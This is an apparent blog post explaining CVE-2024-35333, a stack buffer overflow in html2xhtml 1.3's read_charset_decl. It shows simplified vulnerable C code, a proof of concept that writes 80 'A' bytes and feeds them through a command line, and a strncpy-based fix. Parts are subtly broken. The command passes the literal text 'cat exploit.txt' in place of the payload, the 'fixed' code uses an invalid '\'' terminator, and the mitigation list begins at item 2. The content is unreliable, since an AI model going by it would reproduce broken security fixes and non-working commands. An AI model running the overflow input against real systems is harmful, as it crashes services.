CVE-2024-35333 - Stack Buffer Overflow in `read_charset_decl` of html2xhtml 1.3 – Explained with Exploit Example

---

Overview

CVE-2024-35333 is a newly discovered vulnerability affecting html2xhtml 1.3, an open-source tool for converting HTML documents into XHTML. This vulnerability is a stack buffer overflow in the function read_charset_decl, caused by improper bounds checking. Attackers can exploit this by supplying a specially crafted input, leading to denial of service, data corruption, or even arbitrary code execution.

This post will cover how the vulnerability works, provide some code examples, walk through a sample exploit, and link to important references.

What is html2xhtml?

html2xhtml is a command-line utility that parses HTML files and converts them into well-formed XHTML. Written in C, it's often used in automated web processing pipelines and data conversion tools.

The Vulnerable Code: read_charset_decl

The vulnerability is located in the read_charset_decl function. Here’s a simplified version of the function illustrating the issue:

void read_charset_decl(char* input) {
    char buf[64];  // Fixed-size buffer on stack
    // Vulnerable usage: no check on input length.
    strcpy(buf, input);
    // ... Further processing
}

How Does the Exploit Work?

An attacker can provide an input longer than 64 bytes (including the null byte) to read_charset_decl. When strcpy runs, it copies all those bytes into buf, overrunning the buffer, and *corrupts* other information on the stack.

Step-By-Step Exploit (Proof-of-Concept)

Let’s walk through how a malicious user might exploit this vulnerability.

1. Crafting the Malicious Input

Suppose an attacker prepares an input string that is 80 bytes long.

# Python code to create the payload
payload = b"A" * 80  # 80 bytes, all 'A'
with open("exploit.txt", "wb") as f:
    f.write(payload)

2. Feeding Input to the Program

Assume html2xhtml allows specifying a charset via an argument or config file that calls read_charset_decl. The attacker feeds the payload from "exploit.txt":

html2xhtml --charset "cat exploit.txt" input.html output.html

How to Fix

The correct way to eliminate this vulnerability is to use a safe string copy that checks boundaries, like strncpy or, better yet, snprintf, and to ensure the buffer is always null-terminated.

Vulnerable

strcpy(buf, input);

Fixed

strncpy(buf, input, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\'; // guarantee null-termination

References

- CVE-2024-35333 Record at NVD (pending)
- html2xhtml Project Page
- Common C Mistakes: Buffer Overflows (CWE-121)
- An Introduction to Stack Smashing Attacks

Do not use html2xhtml 1.3 with untrusted input.

2. Monitor the sourceforge project for patches.

Conclusion

CVE-2024-35333 is a classic, yet dangerous, stack buffer overflow caused by (strcpy)’s careless use in the read_charset_decl function. As history shows, such vulnerabilities can allow attackers to easily crash programs or take control of systems when user input isn’t carefully managed. Until a patch is released, only use trusted input with html2xhtml 1.3, and always validate inputs in C programs.

Timeline

Published on: 05/29/2024 16:15:11 UTC
Last modified on: 08/19/2024 16:35:15 UTC